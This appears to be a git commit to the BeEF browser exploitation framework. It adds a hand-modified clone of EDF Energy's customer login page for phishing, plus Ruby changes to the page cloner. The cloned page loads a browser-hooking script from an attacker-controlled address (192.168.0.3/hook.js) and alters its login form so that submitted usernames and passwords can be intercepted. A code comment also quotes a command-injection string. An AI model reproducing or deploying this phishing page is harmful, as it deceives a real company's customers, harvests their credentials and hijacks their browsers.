Social Eng. extension: the web_cloner can now serve modified pages as well. This is needed when the page uses custom logic to submit the form. Added an example of a modified EDF Energy page.

antisnatchor
2012-09-06 12:37:26 +01:00
parent b3ae5f1016
commit 6ac074d2b0
4 changed files with 877 additions and 75 deletions


@@ -36,13 +36,14 @@ beef:
# available templates
templates:
default:
# images are by default inline, so if you want to attach something, see below
images: ["beef_logo.png"]#,"second_image.png"]
# images are by default inline, so if you want to attach something, see 'attachments' below
images: ["beef_logo.png"]
images_cids:
cid1: "beef_logo.png"
#cid2: "second_image.png"
attachments: ["beef_attachment.pdf"]
edfenergy:
# my-account.edfenergy.com_mod is an example of a modified page (manually modified in order to
# intercept POST requests) to be served with the web_cloner using use_existing = true
images: ["corner-tl.png", "main.png","edf_logo.png","promo-corner-left.png","promo-corner-right-arrow.png","promo-reflection.png","2012.png","corner-bl.png","corner-br.png","bottom-border.png"]
images_cids:
cid1: "corner-tl.png"


@@ -0,0 +1,790 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html><head><LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/glbl/glbl_nn7.css?7.0.20.0.1">
<LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/prtl_std/prtl_std_nn7.css?7.0.20.0.1">
<!-- EPCF: BOB Core -->
<meta http-equiv="Content-Script-Type" content="text/javascript">
<script src="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.epcf.loader/script/optimize/js13_epcf.js?7.00001620"></script>
<script>
<!--
EPCM.relaxDocumentDomain();
EPCM.init( {
Version:7.00001620,
Level:1,
PortalVersion:"7.00.200908152330",
DynamicTop:false, // [service=true nestedWinOnAlias=false]
UAType:21, // [Mozilla]
UAVersion:5.0,
UAPlatform:1, // [Win]
UIPMode:"1", // [Default=1, User=0, Personalize=true]
UIPWinFeatures:"",
UIPPortalPath:"https://my-account.edfenergy.com:443/irj/portal/anonymous",
UIPPopupComp:"",
UIPPopupCompSize:"",
UIPPopupMsgNN:"Your current page contains unsaved data.\r\nDo you want to continue with navigation and open a new window?",
UIPPopupMsgND:"Your current page contains unsaved data.\r\nDo you want to discard the changes and open the content in the same window?",
DBGException:false
} );
EPCM.DSM.init( {
TerminatorURL:"/irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.Terminator",
WinEmptyUrl:"/irj/portalapps/com.sap.portal.dsm/images/empty.gif",
ForcedUserDebug:false,
KeepAliveActive:false,
KeepAliveDelta:840,
KeepAliveStopAfter:36000
} );
function SAPWP_receiveSessInfo( sessInfo, frameRef ){
EPCM.DSM.processSession( sessInfo, frameRef );
}
//-->
</script>
<!-- EPCF: EOB Core -->
<script type="text/javascript">
/*HTML Business for Java, 645_SP_REL, 529005, Wed Jul 22 15:27:56 BST 2009*/
ur_system = {doc : window.document , mimepath :"/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/common/", stylepath : "/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/ur/", emptyhoverurl : "/irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html", is508 : false, dateformat : 1, domainrelaxing : "MINIMAL"};
</script>
<title >MyAccount</title><meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.httpconnectivity.httpauthentication/scripts/CAManagerScript.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/HistoryFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/NavigationFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/FrameworkSupport.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/scripts/pagesupport.js" ></script><link REL=STYLESHEET HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/main_v1.5.css?7.0.20.0.1" TYPE="text/css" ><link REL=STYLESHEET HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/myaccount_v3.css?7.0.20.0.1" TYPE="text/css" ><script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
</head><body class="prtlBody urFontBaseFam urScrl">
<!-- EPCF: Component com.sap.portal.navigation.portallauncher.anonymous, kegighenibibncgidhmmmfdjjggfpmhm -->
<Script>
var caEngine = new CAManager('/irj/servlet/prt/portal/prtroot/com.sap.portal.httpconnectivity.httpauthentication.Engine','dialogHeight:10;dialogWidth:20;center:1;help:0;status:0');
caEngine.registerCAEvent('com.sap.portal.httpconnectivity.httpauthentication','Teach',caEngine,'eventCallBack');
</Script>
<script>
var disableWorkProtectCheck = false;
function popupUnsavedDataBeforeUnload(evt)
{
if ((typeof pageTitleBar != "undefined") && pageTitleBar.backForwardLink)
{
pageTitleBar.backForwardLink = false;
}
else
{
evt = (evt) ? evt : ((window.event) ? event : null);
if ( EPCM.getUAType() != EPCM.MSIE && EPCM.getUAType() != EPCM.MOZILLA) return;
if ( EPCM.getGlobalDirty() && (! disableWorkProtectCheck ))
{
if(EPCM.getUAType() == EPCM.MSIE )
{
evt.returnValue = 'You have unsaved data';
}
else
{
evt.preventDefault();
evt.stopPropagation();
return 'You have unsaved data';
}
}
}
}
try{
if ( EPCM.getUAType() == EPCM.MSIE || EPCM.getUAType()== EPCM.MOZILLA){
if (window==EPCM.getSAPTop()){
window.onbeforeunload = popupUnsavedDataBeforeUnload;
}
}
} catch(ex){}
</script><script>frameworkSupport.init({anonymous:true,phase:'framework',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous'});</script><script>frameworkSupport.init2({contentAreaURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage!2fcom.sap.portal.contentarea',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous',innerPage:'pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.sap.portal.innerpage',innerPageFrameURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage',tlnComp:'/irj/portalapps/com.sap.portal.navigation.toplevel',ObjBasedNavigationURL:'/irj/servlet/prt/portal/prtroot/com.sap.portal.navigation.objbased.ObjBasedNavigation',serverPath:'https://my-account.edfenergy.com:443',usedConnectors:''});</script>
<span id=divChangeContent name=divChangeContent style="position:absolute;height:0;width:0;top:-5000;left:-5000">
<FORM action="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com" method=POST id="frmChangeContent" name="frmChangeContent">
<INPUT type="hidden" id=NavigationTarget name=NavigationTarget>
<INPUT type="hidden" id=RelativeNavBase name=RelativeNavBase></INPUT>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUhgPrZWDRw08VLuhthw6Alf_ythxgZRxx-bn2SU9GjY2G8UFdotsliPfe5ArbcVEM="></FORM>
<form id='obnNavForm' method='post' target='obnNavIFrame' action="/irj/portal/anonymous"> <input type='hidden' name='systemAlias'>
<input type='hidden' name='businessObjName'>
<input type='hidden' name='objValue'>
<input type='hidden' name='operation'>
<input type='hidden' name='usePost' value='false'>
<input type='hidden' name='source'>
<input type='hidden' name='resolvingMode' value='Default'>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUZncgeJn0nDtoKgRZLTHoNG9b8gjXLxyg1JXcdz0DDEk4i74Lypj65OK5A4udLxsoXWiF7rrPTfgID-qUNr8-D6aXCTTHzGtpGEifQUi875Ykz1XmE69Xx"></form>
</span>
<iframe src='https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html' style='position:absolute;height:0;visibility:hidden' name='obnNavIFrame' id='obnNavIFrame'></iframe>
<script>var disablePersonalize = true;</script>
<!-- EPCF: Component com.sap.portal.pagebuilder.pageBuilder, agnkfkoliedeidmfenendpdjjggfpmic -->
<SCRIPT>var emptyDocumentUrl = "/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html";</SCRIPT>
<!-- EPCF: Component com.sap.portal.layouts.framework.light_framework, fbkobmdfenlemkgnkdbnmfdjjggfpmip -->
<SCRIPT>if (typeof EPCM != "undefined") {EPCM.relaxDocumentDomain();} else { var d=document.domain; if (d.search(/^\d+\.\d+\.\d+\.\d+$/)>=0) {} else { var l=d.indexOf("."); if (l>=0) {d=d.substr(l+1)} } if (document.domain != d) {document.domain = d;}}
pageSupport.pageHelperUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.PageHelper';
pageSupport.proxyModesUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.IviewModeProxy';
pageSupport.addPageId('pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg','0','local');
pageSupport._addIvuPageId("pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.edfe.orchard.pct.Logon_ivu","page0ivu0");
pageSupport._addIViewBank("page0ivu0",new iviewBank("","",pageSupport.EMBEDDED,1,"0","","GET"));
</SCRIPT>
<script>
document.body.style.margin=0;
document.body.scroll = "no";
</script>
<TABLE style="WIDTH: 100%" cellSpacing=0 cellPadding=0 class="prtlHeaderCon" ><TR><TD>
<!-- EPCF: Component com.edfe.orchard.Logon.LogonComp, fchmhdeefnpeknleddanfldjjggfpmig -->
<html xmlns:xalan-nodeset="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content="HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<title>MyAccount</title>
<link rel="SHORTCUT ICON" href="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/favicon/favicon.ico" />
<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/edfenergy-ga-script-n.js"></script>
<script type="text/javascript">
loadTrackCode('UA-25608035-1');
_gaq.push(['_trackPageview', 'Login']);
</script>
<script language="JavaScript">
/*var emailRegEx = /^([a-zA-Z0-9_\.\!\#\$\%\^\&\*\{\}\~\`\+\_\=\?\'\|\"\-]{2,})\@(([a-zA-Z0-9\-]{2,})\.)+([a-zA-Z]{2,4})+$/;*/
var emailRegEx = /^\s*[\w\-\+_\{\}\~\`\+\_\=\?\'\|\"\-\!\#\$\%\^\&\*]+(\.[\w\-\+_\']+)*\@[\w\-\+_]+\.[\w\-\+_]+(\.[\w\-\+_]+)*\s*$/;
var Monitor_Flag1 = true;
document.onkeyup = checkKeyPressed;
window.history.forward(1);
function EDFEDisableSubmitButton1( button_text1, button_id1 )
{
var bid = button_id1;
var btext = button_text1;
document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
}
function checkCode()
{
if(event.keyCode==13)
{
event.keyCode=9;
}
}
function checkKeyPressed()
{
if(event.keyCode==13)
{
if(Monitor_Flag1!=null && Monitor_Flag1==true){
callGA('yes');
}
else
{
callGA('no');
}
}
}
function change(param1,param2)
{
param1.style.backgroundColor = param2;
}
function allValidChars(email)
{
var parsed = true;
var validchars = "abcdefghijklmnopqrstuvwxyz0123456789@.-_!#$%&`*+-/=?^'{}|~\"";
for (var i=0; i < email.length; i++)
{
var letter = email.charAt(i).toLowerCase();
if (validchars.indexOf(letter) != -1)
continue;
parsed = false;
break;
}
return parsed;
}
function trim(str) {
return str.replace(/(^[\s\xA0]+|[\s\xA0]+$)/g, '');
}
function validateEmail(email)
{
var decision = true;
if(trim(email)!= null && trim(email) !=""){
if(email.match(emailRegEx)){
decision = true;
}else{
decision = false;
}
}else{
decision = false;
}
/*
if (! allValidChars(email))
{
decision = false;
}
if (email.indexOf("@") < 1)
{
decision = false;
}
if(email.indexOf("@")!=email.lastIndexOf("@"))
{
decision = false;
}
else if (email.lastIndexOf(".") <= email.indexOf("@"))
{
decision = false;
}
else if (email.indexOf("@") == email.length)
{
decision = false;
}
else if (email.indexOf("..") >=0)
{
decision = false;
}
else if (email.indexOf(".") == email.length)
{
decision = false;
}*/
if(!decision)
{
document.logonForm.f_username.focus();
change(document.logonForm.f_username,'#FFFFFF'); // Cosmotic Changes
document.getElementById('errorMessage').innerHTML = "Please enter a valid email address";
document.getElementById('errorMessage1').innerHTML = "";
}
else
{
change(document.logonForm.f_username,'#FFFFFF');
}
return decision;
}
function callGA(GA)
{
if(GA!=null && GA=="yes")
{
_gaq.push(['_trackPageview', 'LoginAttempted']);
}
var t = setTimeout("validateLogin()", 100);
}
function validateLogin()
{
var email = document.logonForm.f_username.value;
var pass = document.logonForm.f_passwd.value;
if(email==null || email=="")
{
document.logonForm.f_username.focus();
document.getElementById('errorMessage').innerHTML = "Please enter your 'username', which is your email address";
document.getElementById('errorMessage1').innerHTML = "";
return false;
}
else
{
if(validateEmail(email))
{
if(pass==null || pass=='')
{
document.logonForm.f_passwd.focus();
document.getElementById('errorMessage').innerHTML = "Please enter your password";
document.getElementById('errorMessage1').innerHTML = "";
change(document.logonForm.f_passwd,'#FFFFFF');
return false;
}
else
{
change(document.logonForm.f_passwd,'#FFFFFF');
document.logonForm.action = "/nclogin.submit";
EDFEDisableSubmitButton1('Login','EDFElogonButton');
document.logonForm.submit();
}
}
}
}
function validateFU()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController";
document.logonForm.submit();
}
function validateFP()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp";
document.logonForm.submit();
}
function validateRegisterSME()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=SME";
document.logonForm.submit();
}
function validateRegisterResi()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=RESI";
document.logonForm.submit();
}
function validateMR()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller";
document.logonForm.submit();
}
</script>
<script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
</head>
<body onLoad="history.forward(); document.logonForm.f_username.focus();">
<div id="wrap">
<div id="outer-right">
<div id="outer">
<!--------------------------- start top section ----------------------------------->
<script>
function performSearch()
{
var searchItem = document.getElementById('searchBox');
window.open('http://www.edfenergy.com/search-results.php?query='+searchItem.value,'_blank');
}
function clearText()
{
document.getElementById('searchBox').value="";
}
function EDFEDisableSubmitButton( button_text, button_id )
{
var bid = button_id;
var btext = button_text;
document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
}
</script>
<!--------------------------- start top section ----------------------------------->
<div id="header">
<p class="hide-element">
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#pnav">skip to primary navigation</a>
</p>
<div id='logo'>
<img src='https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/edfenergy_logo2.gif' title='EDF Energy' alt='EDF Energy' width='56' height='89' border='0' />
</div><!-- start top utilities -->
<div id="toplinks">
<div class="left">
<ul>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">Home</a></li>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">MyAccount</a></li>
<li><a href="https://my-account.edfenergy.com/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller">My meter reading</a></li>
</ul>
</div>
<div class="right">
<ul>
<li><a href="http://www.edf.com" target="_blank">EDF Group</a></li>
</ul>
<div id="searchform">
<form name="SearchForm" id="SearchForm" action="/irj/portal/anonymous"> <input name="searchBox" id="searchBox" type="text" value="Search" class="searchtextbox" onfocus="clearText()" />
<input name="searchSubmit" type="image" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/search-icon.png" title="Perform Search" class="faq-button" onclick="performSearch(); return false;" />
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWulwL539YlRxugW3Unfla8YtGvDKb-X_2YFxvNDTOZUB0qVQVl6ZXF"></form>
</div>
</div>
</div>
<div id="olympiclogo">
<img src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/london2012_logo_new.gif" alt="London 2012 Official Electricity Supplier" title="London 2012 Official Electricity Supplier" />
</div><!-- end top utilities -->
<!-- start top navigation -->
<div id="topnav">
<div id="topnav-inner">
<p class="hide-element">
<a name="pnav" id="pnav">primary navigation</a>
</p>
<p class="hide-element">
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#snav">skip to secondary navigation</a>
</p>
<ul>
<li>
<a target="_blank" href="https://www.edfenergy.com/products-services/index.shtml" >Products &amp; Services</a>
</li>
<li>
<a target="_blank" href="http://www.edfenergy.com/energyfuture">Energy Future</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/about-us/index.shtml">About us</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/sustainability/index.shtml">Sustainability</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/careers/index.shtml">Careers</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/media-centre/index.shtml">Media centre</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/safety-emergencies/index.shtml">Safety &amp; emergencies</a>
</li>
</ul>
<div class="clearFix"></div>
</div>
</div><!-- end top navigation -->
</div>
<!--------------------------- end top section ----------------------------------->
<!--------------------------- end top section ----------------------------------->
<div id="pagehold">
<!--------------------------- start left section ----------------------------------->
<SCRIPT>
function fnNavigateMenu(locationURL,navigParam,menuIden)
{
if (navigParam == 'false')
{
document.outsidemenu.menuidentifier.value = menuIden ;
document.outsidemenu.action = locationURL ;
document.outsidemenu.submit() ;
}
else
{
window.open(locationURL) ;
}
}
</SCRIPT>
<!-- start left section forgottenusername.html;forgottenpassword.html -->
<div id="leftnav-outer">
<div id="leftnav">
<ul>
<li><ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller','false','EMR')" >Submit meter reading</a></ul></li>
<li>
<ul>
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('http://www.edfenergy.com/contact-us/index.shtml','true','CONTACTUS')">Contact us</a>
</ul>
</li>
<li>
<ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="current" onClick="fnNavigateMenu('/irj/portal/anonymous','false','LOGON')" >Login / Register</a>
<ul>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController','false','FUN')" >Forgotten your username</a></li>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp','false','FUP')" >Forgotten your password</a></li>
</ul>
</ul>
</li>
</ul>
<ul>
<br/><br/>
<div id="lpButtonDiv" align="center">
</div>
</ul>
</div>
</div>
<!-- end left section -->
<form name="outsidemenu" method="POST" action="/irj/portal/anonymous"> <input type="hidden" name="menuidentifier" value="">
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWqJ6R7zZUHhDE15UF2cpEumhm0TWuQDLfNnOD8MqMtjNF30GgZOV1f"></form>
<!--------------------------- end left section ----------------------------------->
<!--------------------------- start middle section ----------------------------------->
<div id="maincontent-wrap" class="fullwidth">
<p class="hide-element">
<a name="cont" id="cont">main content</a>
</p>
<div id="maincontent-full" class="nobanner">
<div id="banner" class="BannerWith2Circles">
<h1>
Login / Register
</h1>
<div id="banner_text_wrap">
<img alt="" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/banners/my-account.jpg" />
<div id="banner_text">
<p>
&nbsp;<br />&nbsp;<br />Login or register<br />to access your<br />
energy account online<br />&nbsp;<br />&nbsp;<br />&nbsp;<br />&nbsp;
</p>
</div>
</div>
</div>
<div id="two-col-wrap" class="two_col_wrap_bg">
<div id="content" class="make-full">
<div id="data">
<div id="leftcolumn">
<h2>Login to MyAccount</h2>
<!-- Prototype Builder Start srm::-->
<form name="logonForm" method="post" action="/irj/portal/anonymous">
<span class="legacymessage">
</span>
<span class="legacymessage">
</span>
<span class="warningmessage" id="errorMessage"></span><BR/>
<span class="warningmessage" id="errorMessage1"></span>
<input type ="hidden" name = "f_method" value = "LOGIN" />
<table class="formfields" border="1" summary="Visual Layout for the login form">
<tbody>
<tr>
<th><label for="f_username">Username (email address)<em>*</em></label></th><td>
<input id="f_username" name="f_username" type="text" size="27" maxlength="241" tabindex="1" value=""/>
<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_username"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter your username</SPAN></A>
</td>
</tr>
<tr>
<th><label for="f_passwd">Password<em>*</em></label></th><td>
<input id="f_passwd" name="f_passwd" type="Password" size="18" maxlength="16" tabindex="2" autocomplete=OFF/>
<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_passwd"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter the password for this account</SPAN></A>
</td>
</tr>
</tbody>
</table>
<input type="submit" value="Login" style="background:#FE5815;color:white!important;heigth:6em;width:7em;font-size:14px;font-family:arial;font-weight:500;margin:0px;padding-left:15px;padding-right:15px;padding-top:7px;padding-bottom:7px;border:none;cursor:pointer">
<br /><br /><br />
<p>Forgotten your <a href="javaScript:validateFU();">username</a> or <a href="javaScript:validateFP();">password</a>?</p>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUN7mVuDM1dmcrQChOQXirPHBYBwncOB_h5_QMzu8x_5eBlZcqXpqJKJuOtpQFlZPpXFhCbOjTPxw=="></form>
<!-- Prototype Builder End -->
</div>
<div id="rightcolumn">
<h2>Register Today!</h2>
<p>&nbsp;</p>
<ul>
<li class="tick"> View and pay your bills</li>
<li class="tick"> Submit your meter reading</li>
<li class="tick"> Update your details</li>
<li class="tick"> Sign up for Direct Debit</li>
</ul><br/>
<table border=0><tr>
<td>
<div class="btbu" id="registerButtonResi"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterResi();" class="">Register your<br> home &raquo;</a></div>
</td><td>
&nbsp;&nbsp;&nbsp;</td>
<td> <div class="btbu" id="registerButtonSME"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterSME();" class="">Register your<br> business &raquo;</a></div>
</td></tr>
</table>
<br/>
<p><strong>Don't have an online account?</strong><br/>You can still <a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateMR();">submit a meter reading</a></p>
</div>
</div>
</div>
</div>
</div>
</div>
<!--------------------------- end middle section ----------------------------------->
</div><!--pagehold-->
<!--------------------------- start bottom section ----------------------------------->
<script type="text/javascript">
var __stormJs = 't1.stormiq.com/dcv4/jslib/3171_71E90107_6FC7_48DB_B3F5_713D754C9B89.js';
</script>
<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/track.js"></script>
<script type="text/javascript">
function TermsAndConditions()
{
window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=TermsAndConditions.htm","MyAccount","location=no,scrollbars=yes");
//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=tnc";
}
function PrivacyPolicy()
{
window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=Privacy.html","MyAccount","location=no,scrollbars=yes");
//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=privacy";
}
// Removes leading whitespaces
function LTrim( value ) {
var re = /\s*((\S+\s*)*)/;
return value.replace(re, "$1");
}
// Removes ending whitespaces
function RTrim( value ) {
var re = /((\s*\S+)*)\s*/;
return value.replace(re, "$1");
}
// Removes leading and ending whitespaces
function trim( value ) {
return LTrim(RTrim(value));
}
</script>
<!-- start bottom section -->
<div id="footer">
<ul>
<li>
<a href="javascript:TermsAndConditions();">Terms &amp; conditions</a>
</li>
<li>
<a href="javascript:PrivacyPolicy();">Privacy</a>
</li>
<li>
<a href="http://www.edfenergy.com/products-services/accessibility.shtml" target="_blank">Accessibility</a>
</li>
<li>
<a href="http://www.edfenergy.com/products-services/copyright.shtml" target="_blank">Copyright statement</a>
</li>
<li class="last">
<a href="http://www.edfenergy.com/products-services/fuel-mix.shtml" target="_blank">Our fuel mix</a>
</li>
</ul>
<p class="copy"> &copy; EDF Energy 2012 All rights reserved</p>
<p class = "cookiePolicy">By continuing to use this site, you agree to our <a target="_blank" href="http://www.edfenergy.com/about-us/cookies/cookie-policy.shtml" style = "text-decoration:underline; color: #fff">Cookie Policy</a>.If you don't agree to Cookies<br>being stored on your computer in line with that policy please navigate away from this site.</p>
</div>
<!-- end bottom section -->
<SCRIPT>
document.body.scroll = "";
</SCRIPT>
<!--------------------------- end bottom section ----------------------------------->
</div><!--outer-->
</div>
</div><!--wrap-->
</body>
</html>
</TD></TR></TABLE>
</body></html>


@@ -40,6 +40,7 @@ module BeEF
body = JSON.parse request.body.read
uri = body["url"]
mount = body["mount"]
use_existing = body["use_existing"]
if uri != nil && mount != nil
if (uri =~ URI::regexp).nil? #invalid URI
@@ -53,7 +54,7 @@ module BeEF
end
web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance
success = web_cloner.clone_page(uri,mount)
success = web_cloner.clone_page(uri,mount,use_existing)
if success
result = {
"success" => true,
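Review bot: `use_existing` is taken from the JSON body and handed to `clone_page` without any type normalisation, so its meaning depends on how the client encodes it. The usage comment added in the web cloner shows the value sent as the string `"true"`, while the cloner only treats `nil` and the boolean `false` as "fetch again"; a client sending the string `"false"` would therefore be handled as if it had asked for the existing file. Coerce the value once at this boundary, for example `use_existing = [true, "true"].include?(body["use_existing"])`, so that everything downstream sees a real boolean. The handler's body starts and ends outside these two hunks.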


@@ -27,7 +27,7 @@ module BeEF
@beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}"
end
def clone_page(url, mount)
def clone_page(url, mount, use_existing)
print_info "Cloning page at URL #{url}"
uri = URI(url)
output = uri.host
@@ -35,84 +35,94 @@ module BeEF
user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
success = false
# prevent command injection attacks, passing URLs like (http://antisnatchor'||touch /tmp/foo #). No shells are open in the following case.
begin
IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate","--background"], 'r+') do |wget_io| end
success = true
rescue Exception => e
print_error "Errors executing wget: #{e}"
print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
end
if success
File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
# Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
if line.include?("<form ")
line_attrs = line.split(" ")
c = 0
cc = 0
#todo: probably doable also with map!
# Sometimes pages use Javascript/custom logic to submit forms. In these cases even having a powerful parser,
# there is no need to implement the complex logic to handle all different cases.
# We want to leave the task to modify the xxx_mod file to the BeEF user, and serve it through BeEF after modification.
# So ideally, if the the page needs custom modifications, the web_cloner usage will be the following:
# 1th request. {"uri":"http://example.com", "mount":"/"} <- clone the page, and create the example.com_mod file
# - the user modify the example.com_mod file manually
# 2nd request. {"uri":"http://example.com", "mount":"/", "use_existing":"true"} <- serve the example.com_mod file
#
if use_existing.nil? || use_existing == false
begin #,"--background"
IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate"], 'r+') do |wget_io| end
success = true
rescue Exception => e
print_error "Errors executing wget: #{e}"
print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
end
